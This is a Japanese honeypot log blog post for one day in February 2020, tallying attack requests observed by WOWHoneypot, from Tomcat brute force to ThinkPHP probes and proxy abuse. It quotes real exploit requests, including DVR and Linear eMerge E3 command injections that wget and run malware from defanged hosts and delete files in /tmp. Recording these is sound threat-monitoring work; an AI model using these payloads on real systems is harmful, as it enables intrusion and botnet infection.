23log

WOWHoneypotで観測した日々のログをつらつらと

WOWHoneypot観察(326日目)

2020/02/06(木)

トータルは414件でした。

ハンティングログは以下です。

80.22.8[.]239 wget hxxp[:]//switchnets[.]net/hoho.arm7

www.virustotal.com
www.virustotal.com

113.22.118[.]111 wget+hxxp[:]//scan[.]casualaffinity[.]net/jaws
183.80.231[.]120 wget+hxxp[:]//scan[.]casualaffinity[.]net/jaws
95.57.107[.]84 wget+hxxp[:]//scan[.]casualaffinity[.]net/jaws

www.virustotal.com
www.virustotal.com

件数 概要 リクエス
341 Tomcat管理ページに対するブルートフォース攻撃 GET /manager/html
34 アクセス GET /
4 ThinkPHPお脆弱性を狙った通信 POST /TP/public/index.php?s=captcha
4 ThinkPHPお脆弱性を狙った通信 GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
4 ThinkPHPお脆弱性を狙った通信 GET /TP/public/index.php
4 調査 GET /is_test
3 MVPower DVRの脆弱性を狙った通信 GET /shell?cd+/tmp;rm+-rf+*;wget+hxxp[:]//scan.casualaffinity.net/jaws;sh+/tmp/jaws
2 Spring Data Commonsの脆弱性を狙った通信 POST /users?page=&size=5
2 Wordpress管理画面の調査 GET /wp-admin/
2 不正中継の試み CONNECT ip.ws.126.net:443
1 POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
1 不正中継の調査 HEAD hxxp[:]//123.125.114.144/
1 不明 HEAD /esps/
1 不正中継の調査 GET hxxp[:]//js.sogou.com/pv_sogou.js
1 不正中継の調査 GET hxxp[:]//api.gxout.com/proxy/check.aspx
1 Solrの調査 GET /solr/admin/info/system?wt=json
1 調査 GET /logs
1 ThinkPHPお脆弱性を狙った通信 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP
1 Linear eMerge E3の脆弱性を狙った通信 GET /card_scan_decoder.php?No=30&door=%60wget%20hxxp[:]//switchnets.net/hoho.arm7;%20chmod%20777%20hoho.arm7;%20./hoho.arm7%20linear%60
1 ThinkCMFの脆弱性を狙った通信 GET /?a=fetch&content=die(@md5(HelloThinkCMF))
1 リモートデバッグの調査 GET /?XDEBUG_SESSION_START=phpstorm
1 不正中継の試み CONNECT www.baidu.com:443
1 不正中継の試み CONNECT cn.bing.com:443
1 不正中継の試み CONNECT 123.126.104.68:80